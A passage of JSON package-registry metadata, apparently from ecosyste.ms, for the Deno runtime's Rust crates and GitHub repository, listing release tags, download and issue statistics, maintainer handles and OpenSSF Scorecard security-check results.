deno/tags/v0.1.4/manifests"},{"name":"v0.1.3","sha":"59f3fca166e7d3bd3095f9df0f7040defe3239e1","kind":"commit","published_at":"2018-09-06T03:08:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.3/manifests"},{"name":"v0.1.2","sha":"cce3bd470b19e1c2eab6530d06c48949891a56fc","kind":"commit","published_at":"2018-08-30T22:29:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.2/manifests"},{"name":"v0.1.1","sha":"c42e4ddbb7973bfb0c57a49ab6bf6dc432baad7e","kind":"commit","published_at":"2018-08-28T13:37:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.1/manifests"},{"name":"v0.1.0","sha":"68d388229ea6ada339d68eb3d67feaff7a31ca97","kind":"commit","published_at":"2018-08-23T14:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.0/manifests"},{"name":"v0.0.3","sha":"ca4ace6b1f054593029df4958538708c2fbbabc2","kind":"commit","published_at":"2018-08-22T16:08:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.3/manifests"},{"name":"v0.0.2","sha":"6a8fbc8b522a710699bcf9738c2194dec797b428","kind":"commit","published_at":"2018-08-21T03:43:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.2/manifests"},{"name":"v0.0.1","sha":"67d89ff692a88ae42145043eac1a5c58413ae110","kind":"commit","published_at":"2018-08-17T16:58:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.0.1/manifests"}]},"repo_metadata_updated_at":"2026-08-22T22:23:54.738Z","dependent_packages_count":0,"downloads":138287,"downloads_period":"total","dependent_repos_count":0,"rankings":{"downloads":95.35171702115461,"dependent_repos_count":23.617496990196642,"dependent_packages_count":31.33520609986814,"stargazers_count":null,"forks_count":null,"docker_downloads_count":null,"average":50.10147337040647},"purl":"pkg:cargo/deno_process","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/cargo/deno_process","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/cargo/deno_process","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/cargo/deno_process/dependencies","status":null,"funding_links":[],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-22T15:36:05.774Z","issues_count":6593,"pull_requests_count":9606,"avg_time_to_close_issue":17240482.91906903,"avg_time_to_close_pull_request":1537756.603103103,"issues_closed_count":3779,"pull_requests_closed_count":7991,"pull_request_authors_count":571,"issue_authors_count":2462,"avg_comments_per_issue":2.5116032155316246,"avg_comments_per_pull_request":0.7158026233603998,"merged_pull_requests_count":6976,"bot_issues_count":0,"bot_pull_requests_count":47,"past_year_issues_count":659,"past_year_pull_requests_count":1189,"past_year_avg_time_to_close_issue":1375932.5787037036,"past_year_avg_time_to_close_pull_request":1325136.485893417,"past_year_issues_closed_count":216,"past_year_pull_requests_closed_count":638,"past_year_pull_request_authors_count":177,"past_year_issue_authors_count":370,"past_year_avg_comments_per_issue":1.2109256449165402,"past_year_avg_comments_per_pull_request":1.07905803195963,"past_year_bot_issues_count":0,"past_year_bot_pull_requests_count":16,"past_year_merged_pull_requests_count":468,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/issues","maintainers":[{"login":"bartlomieju","count":1779,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"dsherret","count":1732,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"littledivy","count":926,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"nathanwhit","count":673,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"kt3k","count":443,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"},{"login":"nayeemrmn","count":374,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nayeemrmn"},{"login":"lucacasonato","count":353,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"mmastrac","count":314,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mmastrac"},{"login":"denobot","count":288,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"crowlKats","count":281,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"iuioiua","count":269,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/iuioiua"},{"login":"devsnek","count":164,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"satyarohith","count":150,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/satyarohith"},{"login":"ry","count":110,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"magurotuna","count":65,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"losfair","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/losfair"},{"login":"piscisaureus","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"aapoalas","count":18,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aapoalas"},{"login":"philhawksworth","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/philhawksworth"},{"login":"arnauorriols","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/arnauorriols"},{"login":"lucab","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucab"},{"login":"qti3e","count":2,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/qti3e"},{"login":"ashleysyg","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ashleysyg"},{"login":"Elizarspbspb","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Elizarspbspb"},{"login":"RomanDavlyatshin","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/RomanDavlyatshin"},{"login":"aryyawijaya","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/aryyawijaya"},{"login":"Mohsen-mhm","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Mohsen-mhm"}],"active_maintainers":[{"login":"bartlomieju","count":377,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bartlomieju"},{"login":"nathanwhit","count":187,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nathanwhit"},{"login":"littledivy","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/littledivy"},{"login":"dsherret","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/dsherret"},{"login":"crowlKats","count":32,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/crowlKats"},{"login":"devsnek","count":12,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/devsnek"},{"login":"denobot","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/denobot"},{"login":"magurotuna","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/magurotuna"},{"login":"piscisaureus","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/piscisaureus"},{"login":"ry","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ry"},{"login":"lucacasonato","count":3,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lucacasonato"},{"login":"kt3k","count":1,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kt3k"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages/deno_process/codemeta","maintainers":[{"uuid":"91327","login":"bartlomieju","name":"Bartek Iwańczuk","email":null,"url":"https://github.com/bartlomieju","packages_count":116,"html_url":"https://crates.io/users/bartlomieju","role":null,"created_at":"2025-01-15T11:36:50.040Z","updated_at":"2025-01-15T11:36:50.040Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/bartlomieju/packages"},{"uuid":"221986","login":"denobot","name":null,"email":null,"url":"https://github.com/denobot","packages_count":106,"html_url":"https://crates.io/users/denobot","role":null,"created_at":"2025-01-19T09:43:05.303Z","updated_at":"2025-01-19T09:43:05.303Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers/denobot/packages"}],"registry":{"name":"crates.io","url":"https://crates.io","ecosystem":"cargo","default":true,"packages_count":334031,"maintainers_count":70996,"namespaces_count":0,"keywords_count":71627,"github":"rust-lang","metadata":{"funded_packages_count":30452,"rate_limit":2},"icon_url":"https://github.com/rust-lang.png","created_at":"2022-04-04T15:19:22.689Z","updated_at":"2026-09-01T05:05:21.464Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/crates.io/namespaces"}},{"id":13868084,"name":"deno_dotenv","ecosystem":"cargo","description":"dotenv file parser for Deno","homepage":null,"licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/denoland/deno","keywords_array":[],"namespace":null,"versions_count":26,"first_release_published_at":"2026-02-20T15:43:42.347Z","latest_release_published_at":"2026-08-06T11:47:07.477Z","latest_release_number":"0.26.0","last_synced_at":"2026-08-29T21:57:51.821Z","created_at":"2026-02-20T15:47:25.097Z","updated_at":"2026-08-29T21:57:51.821Z","registry_url":"https://crates.io/crates/deno_dotenv/","install_command":"cargo install deno_dotenv","documentation_url":"https://docs.rs/deno_dotenv/","metadata":{"categories":[]},"repo_metadata":{"id":37251508,"uuid":"133442384","full_name":"denoland/deno","owner":"denoland","description":"A modern runtime for JavaScript and TypeScript.","archived":false,"fork":false,"pushed_at":"2026-08-22T12:52:12.000Z","size":247311,"stargazers_count":108275,"open_issues_count":1528,"forks_count":6351,"subscribers_count":1426,"default_branch":"main","last_synced_at":"2026-08-22T15:40:08.889Z","etag":null,"topics":["deno","javascript","rust","typescript"],"latest_commit_sha":null,"homepage":"https://deno.com","language":"Rust","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/denoland.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":".github/CONTRIBUTING.md","funding":null,"license":"LICENSE.md","code_of_conduct":".github/CODE_OF_CONDUCT.md","threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":".github/SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"claude":"CLAUDE.md","gemini":null,"cursor":null,"copilot":".github/copilot-instructions.md","dco":null,"cla":null,"disclosure":null}},"created_at":"2018-05-15T01:34:26.000Z","updated_at":"2026-08-22T14:38:59.000Z","dependencies_parsed_at":"2026-08-08T17:34:36.142Z","dependency_job_id":null,"html_url":"https://github.com/denoland/deno","commit_stats":{"total_commits":12946,"total_committers":999,"mean_commits":12.95895895895896,"dds":0.8464390545342191,"last_synced_commit":"9ad0d4c3db85ce9f8007dc088d164bcc7f544708"},"previous_names":[],"tags_count":440,"template":false,"template_full_name":null,"purl":"pkg:github/denoland/deno","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","download_url":"https://codeload.github.com/denoland/deno/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/sbom","scorecard":{"id":334411,"data":{"date":"2025-08-11","repo":{"name":"github.com/denoland/deno","commit":"228574b04210ad54baf04126810e2c113a462bcc"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 14 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":10,"reason":"all changesets reviewed","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: .github/SECURITY.md:1","Info: Found linked content: .github/SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: .github/SECURITY.md:1","Info: Found text in security policy: .github/SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: jobLevel 'contents' permission set to 'write': .github/workflows/promote_to_release.yml:24","Warn: no topLevel permission defined: .github/workflows/cargo_publish.yml:1","Warn: topLevel 'contents' permission set to 'write': .github/workflows/ci.yml:5","Warn: no topLevel permission defined: .github/workflows/node_compat_test.yml:1","Warn: no topLevel permission defined: .github/workflows/post_publish.yml:1","Warn: no topLevel permission defined: .github/workflows/pr.yml:1","Warn: no topLevel permission defined: .github/workflows/promote_to_release.yml:1","Warn: no topLevel permission defined: .github/workflows/start_release.yml:1","Warn: no topLevel permission defined: .github/workflows/version_bump.yml:1","Warn: no topLevel permission defined: .github/workflows/wpt_epoch.yml:1"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE.md:0","Info: FSF or OSI recognized license: MIT License: LICENSE.md:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Binary-Artifacts","score":5,"reason":"binaries present in source code","details":["Warn: binary detected: tests/specs/npm/pkg_index_ts_and_js/node_modules/package/wasm/index.wasm:1","Warn: binary detected: tests/specs/run/error_bad_wasm_import/toolkit.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/cjs_importing/math.wasm:1","Warn: binary detected: tests/specs/run/wasm_module/table_global_memory/mod.wasm:1","Warn: binary detected: tests/specs/run/wasm_unreachable/unreachable.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Branch-Protection","score":8,"reason":"branch protection is not maximal on development and all release branches","details":["Info: 'allow deletion' disabled on branch 'main'","Info: 'force pushes' disabled on branch 'main'","Warn: required approving review count is 1 on branch 'main'","Warn: codeowners review is not required on branch 'main'","Info: status check found to merge onto on branch 'main'","Info: PRs are required in order to make changes on branch 'main'"],"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Signed-Releases","score":0,"reason":"Project has not signed or included provenance with any releases.","details":["Warn: release artifact v2.4.4 not signed: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 not signed: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 not signed: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 not signed: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 not signed: https://api.github.com/repos/denoland/deno/releases/230701638","Warn: release artifact v2.4.4 does not have provenance: https://api.github.com/repos/denoland/deno/releases/239816232","Warn: release artifact v2.4.3 does not have provenance: https://api.github.com/repos/denoland/deno/releases/236453990","Warn: release artifact v2.4.2 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232832123","Warn: release artifact v2.2.14 does not have provenance: https://api.github.com/repos/denoland/deno/releases/232804459","Warn: release artifact v2.4.1 does not have provenance: https://api.github.com/repos/denoland/deno/releases/230701638"],"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Packaging","score":10,"reason":"packaging workflow detected","details":["Info: Project packages its releases by way of GitHub Actions.: .github/workflows/npm_publish.yml:16"],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/cargo_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/cargo_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:790: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:795: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:822: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:829: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:153: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:182: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:194: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:198: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:202: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:216: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:226: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:240: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:251: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:384: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:401: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:462: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:509: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:522: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:731: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:766: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/ci.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:22: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:26: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:41: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:57: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:63: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction 